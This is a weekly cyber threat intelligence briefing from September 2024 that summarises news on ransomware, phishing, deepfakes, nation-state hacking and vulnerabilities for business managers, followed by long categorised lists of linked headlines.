Man charged for selling forged license keys for network switches (bleepingcomputer.com)

Misinformation, Disinformation and Propaganda

Intel agencies warn of Iran's ongoing phishy behavior • The Register

Iranian hackers charged over Trump campaign disruption | TechRadar

Microsoft cracks down further on Russian hackers looking to disrupt elections | TechRadar

Deepfake Ukrainian diplomat targeted US senator on Zoom call (bitdefender.com)

Iranian hackers charged for ‘hack-and-leak’ plot to influence election (bleepingcomputer.com)


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

CFOs Suit Up for Cyber War as Risk Management Evolves (pymnts.com)

Protecting Democratic Institutions from Cyber Threats - Microsoft On the Issues

Israel army hacked the communication network of the Beirut Airport control tower (securityaffairs.com)

Cyber Warfare Industry Research Report 2024-2034: Collaborations Between Governments and Private Sectors Unlocks Opportunities - ResearchAndMarkets.com | Business Wire

Cyber Warfare and Cyber Espionage

Nation State Actors

China

Trojan cars: Why the US fears Chinese cyber attacks on electric vehicles (france24.com)

China-Linked CeranaKeeper Targeting Southeast Asia with Data Exfiltration (thehackernews.com)

The sensitive data of Australia's security personnel is at risk of being on-sold to foreign actors - ABC News

Russia

Russia exploited Evil Corp relationship for NATO attacks • The Register

Multinational police effort hits sections of Lockbit ransomware operation | CyberScoop

UK unmasks LockBit ransomware affiliate as high-ranking hacker in Russia state-backed cyber crime gang | TechCrunch

Police arrest four suspects linked to LockBit ransomware gang (bleepingcomputer.com)

Evil Corp's LockBit Ties Exposed in Latest Phase of Operation Cronos - Infosecurity Magazine (infosecurity-magazine.com)

More LockBit Hackers Arrested, Unmasked as Law Enforcement Seizes Servers - SecurityWeek

Russia’s FSB protected Evil Corp gang that carried out Nato cyber-attacks (yahoo.com)

Trojan cars: Why the US fears Chinese cyber attacks on electric vehicles (france24.com)

Ukraine-Russia Cyber Battles Have Real-World Impact (darkreading.com)

Microsoft and DOJ disrupt Russian FSB hackers' attack infrastructure (bleepingcomputer.com)

Microsoft cracks down further on Russian hackers looking to disrupt elections | TechRadar

Russian Hackers Target Ukrainian Servicemen via Messaging Apps - Infosecurity Magazine (infosecurity-magazine.com)

Deepfake Ukrainian diplomat targeted US senator on Zoom call (bitdefender.com)

bne IntelliNews - Russian tech startups, cyber security firms flourish amid sanctions

Russian authorities arrest nearly 100 in raids tied to cyber criminal money laundering | CyberScoop

Dutch police breached by a state actor (securityaffairs.com)

Law enforcement arrests vacationing LockBit developer in ongoing operation | TechSpot

Iran

UK on high alert over Iranian spear-phishing attacks, says NCSC | Computer Weekly

Intel agencies warn of Iran's ongoing phishy behaviour • The Register

Iranian hackers charged over Trump campaign disruption | TechRadar

Iranian hackers charged for ‘hack-and-leak’ plot to influence election (bleepingcomputer.com)

North Korea

North Korean Hackers Using New VeilShell Backdoor in Stealthy Cyber Attacks (thehackernews.com)

North Korea Profits as 'Stonefly' APT Swarms US Co's. (darkreading.com)

North Korean hackers attack Diehl Defence company - Militarnyi

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Israel army hacked the communication network of the Beirut Airport control tower (securityaffairs.com)

DDoS Attacks Skyrocket and Hacktivist Activity Surges Threatening Critical Global Infrastructure According to NETSCOUT’s 1H2024 Threat Intelligence Report | Business Wire

Hacktivist activity drives a rise in DDoS attacks (betanews.com)

ICE Signs $2 Million Contract With Spyware Maker Paragon Solutions | WIRED


Tools and Controls

Is the Weakest Link in Cyber Security Becoming Even Weaker? | HackerNoon

CFOs Suit Up for Cyber War as Risk Management Evolves (pymnts.com)

Cyber companies need a best practice approach to major incidents. | Computer Weekly

Allies to Leverage During a Cyber Crisis (darkreading.com)

The cyber industry needs to accept it can't eliminate risk | Computer Weekly

As CISO roles expand, so should cyber budgets, says NASCIO 2024 cyber security report | StateScoop

Over Half of Cyber Professionals Feel Their Budget is Underfunded - IT Security Guru

Five Eyes Agencies Release Guidance on Detecting Active Directory Intrusions - SecurityWeek

How to Plan and Prepare for Penetration Testing (thehackernews.com)

Half of Enterprises Surveyed Have Experienced a Security Breach Due to Unmanaged Non-Human Identities, According to AppViewX Report | Business Wire

Session Hijacking 2.0 — The Latest Way That Attackers are Bypassing MFA (thehackernews.com)

Moving DevOps Security Out of 'the Stone Age' (darkreading.com)

Security spending signals major role change for CISOs and their teams | CSO Online

Three hard truths hindering cloud-native detection and response - Help Net Security

Forrester's CISO Budget Planning Guide for 2025: Prioritize API Security - Security Boulevard

Gartner: CISOs should ditch ‘zero tolerance’ prevention (techinformed.com)

API security maturity model to assess API security posture | TechTarget

Large language models hallucinating non-existent developer packages could fuel supply chain attacks | InfoWorld

Top 6 Cloud Security Threats to Watch Out For - Security Boulevard

JPCERT shares Windows Event Log tips to detect ransomware attacks (bleepingcomputer.com)

The Silent Epidemic: Uncovering the Dangers of Alert Fatigue and How to Overcome It (cybereason.com)

Top 5 Myths of AI & Cyber Security (darkreading.com)

How organisations can derive value from security investments and enable business growth | ITPro

How to balance your understanding of threats and how you respond to them | ITPro

Does your security strategy show continuous improvement? | ITPro

The convergence of network and security – how it helps achieve business outcomes | ITPro



Other News

The cyber industry needs to accept it can't eliminate risk | Computer Weekly

Cyber incidents are the Achilles Heel for major UK CEOs, report finds (cityam.com)

Global cyber threat to double predicts new report (emergingrisks.co.uk)

Cyber teams say they can’t keep up with attack volumes | Computer Weekly

How Snoozing on Cyber Security Fails Modern Businesses - Security Boulevard

Governments Urge Improved Security and Resilience for Undersea Cables - Infosecurity Magazine (infosecurity-magazine.com)

UK man allegedly used genealogy sites to hack execs’ email accounts | Fortune

Cyber-Attacks Hit Over a Third of English Schools - Infosecurity Magazine (infosecurity-magazine.com)

UK Post Office axes MoneyGram services in wake of cyber attack (finextra.com)

Feds say Microsoft security ‘requires an overhaul’ — but will it listen? – Computerworld

Global cyber attacks will more than double this year to 211, says QBE - Reinsurance News

Critical Infrastructure: The latest target for cyber criminals? | TechRadar

When Innovation Outpaces Financial Services Cyber Security - Security Boulevard

CISA Urges Action As Attackers Exploit Critical Systems Using Basic Tactics (informationsecuritybuzz.com)

Securing Space in the Age of Advanced Cyber Threats (eetimes.eu)

Schools reminded to maintain cyber hygiene by Ofqual | Education Business (educationbusinessuk.net)

America's policy in cyber space is about persistence, not deterrence (cyberscoop.com)

One-Third of UK Teachers Do Not Have Cyber Security Training (techrepublic.com)

Global Cyber Security Agencies Release OT Security Guidelines (inforisktoday.com)


Vulnerability Management

Could Security Misconfigurations Top OWASP List? (darkreading.com)

What are zero-day vulnerabilities? | TechRadar

NVD still backlogged with 17K+ unprocessed bugs • The Register

Systems used by courts and governments across the US riddled with vulnerabilities | Ars Technica

Vulnerabilities

Highly Anticipated Linux Flaw Allows Remote Code Execution, but Less Serious Than Expected - SecurityWeek

Thousands of Adobe Commerce e-stores hacked by exploiting CosmicSting bug (securityaffairs.com)

Worried about that critical RCE Linux bug? Here's why you can relax | ZDNET

Ivanti Endpoint Manager Flaw Actively Targeted, CISA Warns Agencies to Patch (thehackernews.com)

Progress Software Releases Patches for 6 Flaws in WhatsUp Gold – Patch Now (thehackernews.com)

New Chrome Security Warning For 3 Billion Windows, Mac, Linux, Android Users (forbes.com)

Rackspace systems hit by zero-day exploit of third-party app • The Register

Organisations Warned of Exploited SAP, Gpac and D-Link Vulnerabilities - SecurityWeek

Zimbra RCE Vuln Under Attack Needs Immediate Patching (darkreading.com)

700K+ DrayTek routers are sitting ducks on the internet • The Register

Critical flaw in NVIDIA Container Toolkit allows full host takeover (bleepingcomputer.com)

Microsoft fixes Windows KB5043145 reboot loops, USB and Bluetooth issues (bleepingcomputer.com)

VLC Player Vulnerability Let Attackers Execute Malicious Code (cybersecuritynews.com)

Arc browser adds security bulletins and bug bounties - The Verge

The fix for BGP’s weaknesses – RPKI – has issues of its own • The Register


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.


Black Arrow Cyber Threat Briefing 27 September 2024

Black Arrow Cyber Threat Intelligence Briefing 27 September 2024:

-Cyber Threats Top the 2024 Travelers Risk Index, Fourth Time in Six Years

-Preparing for the Cyber Security and Fraud Risks of Deepfakes: What Executive Teams Need to Know

-Organisation Data on Dark Web Increases Cyber Attack Risk: Marsh McLennan

-84 Percent of Enterprises Suffered Security Incidents in the Last Year

-It's Estimated That 91% of Cyber Attacks Begin with Phishing Emails

-82% of Phishing Sites Now Target Mobile Devices

-UK Firms Are Dangerously Overconfident About Paying Ransoms to Cyber Criminals

-Preparing To Fail is a Vital Part of Cyber Security

-Over a Third of Employees Secretly Sharing Work Info with AI

-Fortifying the Weakest Link: How to Safeguard Against Supply Chain Cyber Attacks

-Underfunding and Leadership Gaps Weaken Cyber Security Defences

-Racist Network Rail Wi-Fi Hack was Work of Malicious Insider

Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

Cyber Threats Top the 2024 Travelers Risk Index, Fourth Time in Six Years

The 2024 Travelers Risk Index shows cyber threats as the top concern for 62% of businesses, surpassing medical cost inflation, employee benefits costs, and economic uncertainty (all at 59%). Despite increased awareness, 30% of over 1,200 respondents lack cyber insurance, though coverage rose to 65% from 60% last year. Cyber incidents rose for the eighth time in nine years, with 24% experiencing breaches. Key concerns include security breaches (57%), ransomware (54%), unsafe employee practices (53%), and system glitches (53%).

Preparing for the Cyber Security and Fraud Risks of Deepfakes: What Executive Teams Need to Know

Reports from the US National Security Agency, the Cybersecurity and Infrastructure Security Agency, and the FBI highlight deepfake technology as a major concern due to the availability of AI tools. Deepfakes can replicate voices and likenesses, making impersonations undetectable. One company lost $25 million to deepfake fraud. Organisations are advised to implement response plans and detection technologies as they become more available, as well as shared phrases to validate identity, but many lack comprehensive strategies, leaving them vulnerable to deepfake-enabled fraud and reputational damage.

Organisation Data on Dark Web Increases Cyber Attack Risk: Marsh McLennan

Searchlight Cyber and the Marsh McLennan Cyber Risk Intelligence Center have found that the presence of any data related to an organisation on the dark web significantly increases the risk of cyber attacks. Despite this, many organisations lack visibility into their dark web exposure. The report emphasises that proactively monitoring the dark web can enable organisations to adjust their defences and effectively stop attacks before they occur.

84 Percent of Enterprises Suffered Security Incidents in the Last Year

Netwrix research shows 84% of enterprises experienced cyber attacks in the past year, up from 65% in 2023. AI automation increases attack frequency and sophistication. Over half of large organisations faced unexpected expenses to fix security gaps. Additionally, 22% faced compliance fines, and 21% suffered reduced competitive edge. Nearly 30% estimate financial damage from cyber threats of at least $50,000.

It's Estimated That 91% of Cyber Attacks Begin with Phishing Emails

Phishing emails cause significant disruption, with 91% of cyber attacks starting this way. Larger companies are vulnerable to lateral phishing (from internal compromised email accounts), while smaller businesses face frequent external phishing and extortion schemes. Smaller businesses experience nearly three times more extortion attacks than larger firms. Many organisations lack tailored security measures to combat evolving email risks, highlighting the need to prioritise email security.

82% of Phishing Sites Now Target Mobile Devices

Zimperium’s 2024 zLabs Global Mobile Threat Report finds 82% of phishing sites target mobile devices, with 76% using HTTPS to appear secure. Unique malware samples increased by 13% year-on-year, with riskware and trojans making up 80% of threats. Healthcare is the most affected industry, with 39% of mobile threats from phishing. Sideloaded apps (installed on a device through unofficial means, bypassing the standard app store) pose significant risks, especially in financial services where 68% of threats are linked to them. Advanced security solutions are essential to protect mobile endpoints.

UK Firms Are Dangerously Overconfident About Paying Ransoms to Cyber Criminals

Cohesity found that ransomware is a top concern for UK organisations, with over half experiencing attacks in 2023. Three-quarters would pay a ransom to recover data, despite only 4% fully recovering after payment. Costs averaged £870,000 per incident, with some reaching £20 million. Fewer than 2% restored operations within 24 hours, and one in five took up to two months. This highlights the need for resilience and robust recovery processes over ransom payments.

Preparing To Fail is a Vital Part of Cyber Security

The UK Government reports that 50% of businesses suffered cyber attacks in 2023. The Synnovis ransomware attack disrupted NHS services, highlighting unpreparedness for worst-case scenarios, including those where an organisation depends on other organisations in its supply chain. Few organisations plan for high-impact risks or supply chain attacks. The report stresses the need for pre-assigned roles and responsibilities to ensure swift remediation. Preparing for the most damaging incidents is essential for organisational survival.

Over a Third of Employees Secretly Sharing Work Info with AI

CybSafe and the National Cyber Security Alliance found that employees sharing sensitive work information with AI tools without permission is a major concern. This behaviour is most prevalent among Gen Z (46%) and millennials (43%). Despite awareness of AI risks, over half of employees lack training on safe AI use. Two-thirds of survey respondents worry AI will make scams harder to detect and increase cyber crime. Trust in how companies implement AI is limited, with 35% of respondents expressing low trust. Organisations need training and robust policies to mitigate AI-related risks.

Fortifying the Weakest Link: How to Safeguard Against Supply Chain Cyber Attacks

Recent incidents have highlighted that vulnerabilities in widely used IT and security tools are a top concern for organisations, with supply chain cyber attacks rising significantly between 2022 and 2023. Despite strengthening direct network defences, many organisations have yet to safeguard against third-party control failures. Key strategies include advanced supplier risk management, securing the software development pipeline, and implementing strong access controls. Adopting frameworks like the NIST cyber security framework and incorporating cyber security requirements into vendor contracts are essential. Without proactive measures, organisations remain vulnerable to significant reputational and operational damage from supply chain cyber attacks.

Underfunding and Leadership Gaps Weaken Cyber Security Defences

Trend Micro found that cyber security threats are the top concern for organisations, but many lack strategic leadership and investment. With 96% of IT leaders worried about the expanding attack surface, the report noted that despite blocking 161 billion threats in 2023 (a 10% increase on the previous year), nearly half of respondents said their leadership did not consider cyber security their responsibility. Only 36% can afford 24/7 coverage, leading to fragmented approaches. Over half believe their organisation’s attitude towards cyber security varies from month to month, highlighting inconsistency in risk management. Cyber security is a boardroom issue, and neglecting it could have disastrous consequences.

Racist Network Rail Wi-Fi Hack was Work of Malicious Insider

A cyber attack on public Wi-Fi at 19 UK railway stations on 25 September blocked passengers from accessing the service, showing them racist and Islamophobic messages instead. The British Transport Police arrested an employee of GlobalReach Technology, the Wi-Fi provider, for suspected involvement. Although no personal data was compromised, the incident underscores the significant risks posed by malicious insiders. Telent, responsible for the network, aims to restore services by the weekend. This event highlights the need for robust insider threat mitigation strategies.

Sources:

https://www.reinsurancene.ws/cyber-threats-top-the-2024-travelers-risk-index-fourth-time-in-six-years/

https://www.jdsupra.com/legalnews/preparing-for-the-cybersecurity-and-3002248/

https://www.reinsurancene.ws/organisation-data-on-dark-web-increases-cyber-attack-risk-marsh-mclennan/

https://betanews.com/2024/09/20/84-percent-of-enterprises-suffered-security-incidents-in-the-last-year/

https://hackernoon.com/its-estimated-that-91percent-of-cyber-attacks-begin-with-phishing-emails

https://www.infosecurity-magazine.com/news/82-phishing-target-mobile-devices/

https://www.itpro.com/security/ransomware/uk-firms-are-dangerously-overconfident-about-paying-ransoms-to-cyber-criminals

https://www.scotsman.com/business/preparing-to-fail-is-a-vital-part-of-cyber-security-ian-mcgowan-4788990

https://www.infosecurity-magazine.com/news/third-employees-sharing-work-info/

https://www.securityweek.com/fortifying-the-weakest-link-how-to-safeguard-against-supply-chain-cyberattacks/

https://informationsecuritybuzz.com/underfunding-and-leadership-gaps-weaken-cybersecurity-defenses/

https://www.computerweekly.com/news/366612056/Racist-Network-Rail-Wi-Fi-hack-work-of-malicious-insider



Threats

Ransomware, Extortion and Destructive Attacks

Companies Often Pay Ransomware Attackers Multiple Times - Security Boulevard

Cyber security experts urge a stronger security posture in response to AI attacks - SiliconANGLE

ENISA Warns About Hacktivist, Ransomware Crossover (databreachtoday.co.uk)

UK firms are dangerously overconfident about paying ransoms to cyber criminals | ITPro

MFA bypass becomes a critical security issue as ransomware tactics advance - Help Net Security

Ransomware Task Force finds 73% attack increase in 2023 | TechTarget

Kryptina Ransomware Resurfaces in Enterprise Attacks By Mallox - Infosecurity Magazine (infosecurity-magazine.com)

How cyber compliance helps minimize the risk of ransomware infections - Help Net Security

Warnings After New Valencia Ransomware Group Strikes Businesses and Leaks Data | Tripwire

Two-Thirds of Healthcare Organisations Hit by Ransomware – (globenewswire.com)

Ransomware Victims

ICO Fine Software Provider £6M Following Ransomware Attack (nelsonslaw.co.uk)

Two-Thirds of Healthcare Organisations Hit by Ransomware – (globenewswire.com)

Cyber attack could cost Western Isles council more than £1m - BBC News

Lancaster Royal Grammar targeted by cyber ransom hackers - BBC News

AutoCanada says ransomware attack "may" impact employee data (bleepingcomputer.com)

US government agency confirms it was hit by major ransomware attack | TechRadar

Delaware Libraries confirms RansomHub cyber attack • The Register

Phishing & Email Based Attacks

It's Estimated That 91% Of Cyber Attacks Begin With Phishing Emails | HackerNoon

Phishing and deepfakes are leading AI-powered threats (betanews.com)

82% of Phishing Sites Now Target Mobile Devices - Infosecurity Magazine (infosecurity-magazine.com)

Enterprises suffer surge in mobile phishing attacks (betanews.com)

Europol Shuts Down Major Phishing Scheme Targeting Mobile Phone Credentials (thehackernews.com)

This Phishing Service Helped Criminals Break Into 1 Million+ Stolen Phones (pcmag.com)

Marko Polo hackers found to be running dozens of scams | SC Media (scmagazine.com)

Spoofing scams find a favourite victim in Microsoft, the brand that cyber criminals love to impersonate | TechRadar

One quarter of small business owners have been targeted by AI-driven scams (prnewswire.com)

75% of organisations say phishing poses the greatest AI risk | Security Magazine

Microsoft 365 Credentials Targeted by TikTok URL-Based Phishing | MSSP Alert

Arrests made after $243 million stolen from one individual in Gemini phishing attack (web3isgoinggreat.com)

Other Social Engineering

Beware: fraud and smishing scams targeting students | Bournemouth University

US indicts two over socially engineered $230M+ crypto heist • The Register

Diddy Do It? Or Did Cyber Criminals? How Hackers Are Turning Scandals Into Cyber Attacks  - Security Boulevard

How to Stop Getting Spam Calls? This Expert Weighs In. (dailydot.com)

Artificial Intelligence

These Are Cyber Chiefs' Biggest Fears About AI (investopedia.com)

Phishing and deepfakes are leading AI-powered threats (betanews.com)

AI threats pushing cyber pros to seek legal safeguards | Cybernews

AI Adoption Set to Unravel Years of Cyber Resilience - IT Security Guru

Brands are changing cybersecurity strategies due to AI threats (securityintelligence.com)

Less Than Half of AI Users Trained on Security and (globenewswire.com)

Over a Third of Employees Secretly Sharing Work Info with AI - Infosecurity Magazine (infosecurity-magazine.com)

HackerOne: 48% of Security Professionals Believe AI Is Risky (techrepublic.com)

Why Executive Teams Should Prepare for the Cyber Security and Fraud Risks of Deepfakes | Epstein Becker & Green - JDSupra

Hackers deploy AI-written malware in targeted attacks (bleepingcomputer.com)

One quarter of small business owners have been targeted by AI-driven scams (prnewswire.com)

Hacker plants false memories in ChatGPT to steal user data in perpetuity | Ars Technica

Are new gen AI tools putting your business at additional risk? (securityintelligence.com)

SANS Institute: Top 5 dangerous cyber attack techniques in 2024 (securityintelligence.com)

The AI-Cybersecurity Paradox: How AI Is Revolutionizing Defences While Empowering Hackers (informationsecuritybuzz.com)

LinkedIn Halts AI Data Processing in UK Amid Privacy Concerns Raised by ICO (thehackernews.com)

Police are using AI to write crime reports. What could go wrong? | ZDNET

2FA/MFA

MFA bypass becomes a critical security issue as ransomware tactics advance - Help Net Security

New Chrome Alert After Hackers Claim 2FA Security Cracked In 10 Minutes (forbes.com)

Malware

AI’s Influence on Malware Attacks Tops IT Pros’ Concerns | MSSP Alert

Unique malware sample volumes seen surging | Computer Weekly

New MacOS Malware Let Attackers Control The Device Remotely (cybersecuritynews.com)

HP Spots a Malware Attack That Was Likely Built With Generative AI (pcmag.com)

RomCom Malware Resurfaces With SnipBot Variant (darkreading.com)

Red Canary’s Midyear Threat Report Highlights Infostealer Surge Targeting MacOS Devices (informationsecuritybuzz.com)

Infostealer malware bypasses Chrome’s new cookie-theft defences (bleepingcomputer.com)

This Windows malware is now evolving to target Linux systems | TechRadar

Move over, Cobalt Strike, there's a new post-exploit tool • The Register

Global infostealer malware operation targets crypto users, gamers (bleepingcomputer.com)

Diddy Do It? Or Did Cyber Criminals? How Hackers Are Turning Scandals Into Cyber Attacks  - Security Boulevard

Malicious Ads Hide Infostealer in League of Legends ‘Download’ - Infosecurity Magazine (infosecurity-magazine.com)

New PondRAT Malware Hidden in Python Packages Targets Software Developers (thehackernews.com)

Russia clings to malware as attacks on Ukraine persist • The Register

Transportation Companies Hit by Cyber Attacks Using Lumma Stealer and NetSupport Malware (thehackernews.com)

Bots/Botnets

65% of websites are unprotected against simple bot attacks - Help Net Security

Unknown Botnet Using Mozilla/5.0 (X11; Linux x86_ User Agent Ignoring Crawl Delay on WordPress Sites | HackerNoon

Mobile

82% of Phishing Sites Now Target Mobile Devices - Infosecurity Magazine (infosecurity-magazine.com)

Mobile Phishing Attacks Targeting Enterprises Surge, Zimperium Researchers Find (prnewswire.com)

11 million Android users infected with dangerous Necro trojan — how to stay safe | Tom's Guide (tomsguide.com)

The NSA advises you to turn off your phone once a week - here's why | ZDNET

Europol Shuts Down Major Phishing Scheme Targeting Mobile Phone Credentials (thehackernews.com)

New Octo Android malware version impersonates NordVPN, Google Chrome (bleepingcomputer.com)

This Phishing Service Helped Criminals Break Into 1 Million+ Stolen Phones (pcmag.com)

New Android banking trojan Octo2 targets European banks (securityaffairs.com)

Victims lose $70k to Play Store wallet-draining app • The Register

Switched-Off Phones, Lithium-Safe Bags! Unprecedented Security Awaits Air Travel Post Pager Blasts: OPED

Opinion | Israel’s Pager Attacks Have Changed the World - The New York Times (nytimes.com)

How Digital Forensics Experts Read Your Encrypted WhatsApp Messages (forbes.com)

Denial of Service/DoS/DDoS

DDoS overtakes ransomware as most active cyber threat in Europe | Cybernews

Austria subjected to pro-Russian DDoS intrusions | SC Media (scworld.com)

Internet of Things – IoT

3 tips for securing IoT devices in a connected world - Help Net Security

Hacking Kia cars made after 2013 using just their license plate (securityaffairs.com)

Data Breaches/Leaks

TfL sends letters to 5,000 cyber attack customers whose details were hacked | Evening Standard

AT&T left your data in the cloud until it got hacked, instead of deleting it when it should have (androidpolice.com)

14 Million Patients Impacted by US Healthcare Data Breaches in 2024 - Infosecurity Magazine (infosecurity-magazine.com)

100 million Americans just had their background check data exposed — phone numbers, dates of birth and more | Tom's Guide (tomsguide.com)

'Harvest now, decrypt later': Why hackers are waiting for quantum computing | VentureBeat

Dell's Security Woes Deepen: Attackers Strike Twice In One Week (informationsecuritybuzz.com)

Harvey Nichols confirms cyber attack, says customer data leaked | TechRadar

Twilio Call Data Exposed | MSSP Alert

Over 90 million French records exposed: mysterious data hoarder leaves instances open | Cybernews

Data of 3,191 congressional staffers leaked in the dark web (securityaffairs.com)

Threat Actor IntelBroker Allegedly Claims Leak of Deloitte Data (cybersecuritynews.com)

US Capitol Hit by Massive Dark Web Cyber Attack - Newsweek

Hacker uses Telegram chatbots to leak data - Security - iTnews

AutoCanada says ransomware attack "may" impact employee data (bleepingcomputer.com)

Organised Crime & Criminal Actors

ENISA Warns About Hacktivist, Ransomware Crossover (databreachtoday.co.uk)

Why so many hackers are Russian | Cybernews

Why so many hackers are Russian: Vol 2 | Cybernews

Life imitates xkcd comic as Florida gang beats crypto password from retiree | Ars Technica

Cybersecurity Experts Closing in on Ticketmaster Hacker (digitalmusicnews.com)

Risk & Repeat: What's next for Telegram and Pavel Durov? | TechTarget

Telegram CEO Pavel Durov will hand over data to government (nypost.com)

Shocking poll: Half the world has fallen victim to cyber attacks (studyfinds.org)

Why Russia is a Hotbed of Cyber Crime | Intel471

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Life imitates xkcd comic as Florida gang beats crypto password from retiree | Ars Technica

Hackers stole over $44 million from Asian crypto platform BingX (securityaffairs.com)

Marko Polo hackers found to be running dozens of scams | SC Media (scmagazine.com)

An official OpenAI X account just got hacked by crypto scammers | Mashable

US indicts two over socially engineered $230M+ crypto heist • The Register

Global infostealer malware operation targets crypto users, gamers (bleepingcomputer.com)

Arrests made after $243 million stolen from one individual in Gemini phishing attack (web3isgoinggreat.com)

Insider Risk and Insider Threats

Racist Network Rail Wi-Fi hack was work of malicious insider | Computer Weekly

Mandiant gives tips on catching North Korean IT operatives • The Register

The Importance of Cyber Security Awareness and Insider Threat Management  - Security Boulevard

Why insider threats are cyber security’s next big challenge - Hindustan Times

Insurance

Cyber insurance price hikes stabilize as insurers expect more from CISOs | CSO Online

The surge in cyber insurance and what it means for your business - Help Net Security

Cyber Insurers Owe Millions for Attack, Transcription Firm Says (bloomberglaw.com)

Supply Chain and Third Parties

Organisations are changing cyber security providers in wake of Crowdstrike outage - Help Net Security

China's 'Salt Typhoon' Cooks Up Cyber Attacks on US ISPs (darkreading.com)

Cyber security: Remember, We Are All Connected (epsnews.com)

Employee arrested over Islamophobic cyber attack on public wifi at major UK railway stations (nationalworld.com)

Evaluating embedded vulnerabilities and cyber security risks in procurement | TechRadar

CrowdStrike Apologizes for IT Outage, Defends Microsoft Kernel Access - Infosecurity Magazine (infosecurity-magazine.com)

CrowdStrike to Congress: 'Perfect storm' led to IT outage • The Register

Fortifying the Weakest Link: How to Safeguard Against Supply Chain Cyber Attacks - SecurityWeek

Cloud/SaaS

AT&T left your data in the cloud until it got hacked, instead of deleting it when it should have (androidpolice.com)

Cyber Security Skills Gap Leaves Cloud Environments Vulnerable - Infosecurity Magazine (infosecurity-magazine.com)

AWS says customers are turning back to on-prem | TechRadar

Microsoft Trims Cloud Cyber Attack Surface (darkreading.com)

Microsoft 365 Credentials Targeted by TikTok URL-Based Phishing | MSSP Alert

Ivanti's Cloud Service Attacked via Second Vuln (darkreading.com)

Outages

Organisations are changing cyber security providers in wake of Crowdstrike outage - Help Net Security

'Cyber security issue' blamed for MoneyGram's ongoing outage • The Register

CrowdStrike exec to apologize for faulty update that caused global IT outage (yahoo.com)

CrowdStrike Apologizes for IT Outage, Defends Microsoft Kernel Access - Infosecurity Magazine (infosecurity-magazine.com)

CrowdStrike to Congress: 'Perfect storm' led to IT outage • The Register

Identity and Access Management

Securing non-human identities: Why fragmented strategies fail - Help Net Security

Active Directory compromise: Cyber security agencies provide guidance - Help Net Security

Encryption

How to prepare for post-quantum computing security | TechTarget

'Harvest now, decrypt later': Why hackers are waiting for quantum computing | VentureBeat

G7 Cyber Expert Group warns financial sector of quantum computing | SC Media (scworld.com)

How Digital Forensics Experts Read Your Encrypted WhatsApp Messages (forbes.com)

Linux and Open Source

Doomsday 9.9 unauthenticated RCE bug affects 'all Linux' • The Register

Printer bug sends researchers into uproar, affects major Linux distros | CyberScoop

This Windows malware is now evolving to target Linux systems | TechRadar

New Mallox ransomware Linux variant based on leaked Kryptina code (bleepingcomputer.com)

Kryptina Ransomware Resurfaces in Enterprise Attacks By Mallox - Infosecurity Magazine (infosecurity-magazine.com)

Paid open-source maintainers spend more time on security - Help Net Security

FreeBSD Hypervisor Vulnerability Lets Attackers Execute Malicious Code (cybersecuritynews.com)

Passwords, Credential Stuffing & Brute Force Attacks

Why You Need a Longer Password (howtogeek.com)

NIST Scraps Passwords Complexity and Mandatory Changes - Infosecurity Magazine (infosecurity-magazine.com)

New cyber security study revealed the 10 most common 4-digit PIN numbers — is yours on the list? - Market Realist

Public Sector Compliance: Passwords and Credentials Matter - Security Boulevard

Social Media

Meta, TikTok and More Sites Engaged in ‘Vast Surveillance,’ a New FTC Study Finds - The New York Times (nytimes.com)

Microsoft 365 Credentials Targeted by TikTok URL-Based Phishing | MSSP Alert

An official OpenAI X account just got hacked by crypto scammers | Mashable

LinkedIn Halts AI Data Processing in UK Amid Privacy Concerns Raised by ICO (thehackernews.com)

Cyber security expert exposes dangerous job scams amid busy September hiring period (nationalworld.com)

42% of daily X users have a negative view of it - losing the block feature won't help | ZDNET

X's first transparency report since Musk reveals a surprising contradiction | ZDNET

Malvertising

Malicious Ads Hide Infostealer in League of Legends ‘Download’ - Infosecurity Magazine (infosecurity-magazine.com)

Training, Education and Awareness

STUDY: Less Than Half of AI Users Trained on Security and (globenewswire.com)

Over a Third of Employees Secretly Sharing Work Info with AI - Infosecurity Magazine (infosecurity-magazine.com)

Combating phishing attacks through awareness and simulation | Cybernews

The Importance of Cyber Security Awareness and Insider Threat Management  - Security Boulevard

Regulations, Fines and Legislation

AT&T left your data in the cloud until it got hacked, instead of deleting it when it should have (androidpolice.com)

ICO Fine Software Provider £6M Following Ransomware Attack (nelsonslaw.co.uk)

Rethinking the United Nations Cybercrime Treaty (justsecurity.org)

Cyber Security | UK Regulatory Outlook September 2024 - Osborne Clarke | Osborne Clarke

UK government's bank data sharing plan blasted by critics • The Register

Bermudan Government may challenge Bermudan ICO on cyber attack records order - The Royal Gazette | Bermuda News, Business, Sports, Events, & Community

Models, Frameworks and Standards

NIST Scraps Passwords Complexity and Mandatory Changes - Infosecurity Magazine (infosecurity-magazine.com)

New NIST program focuses on AI cyber security and privacy | SC Media (scmagazine.com)

Cyber Security for Lawyers: The NIST Cybersecurity Framework as a Tool and Reference | Perkins Coie - JDSupra

Backup and Recovery

Isolated Cyber Vaults: The last line of defence against billions of attacks | TechRadar

Data Protection

AT&T left your data in the cloud until it got hacked, instead of deleting it when it should have (androidpolice.com)

LinkedIn Halts AI Data Processing in UK Amid Privacy Concerns Raised by ICO (thehackernews.com)

Careers, Working in Cyber and Information Security

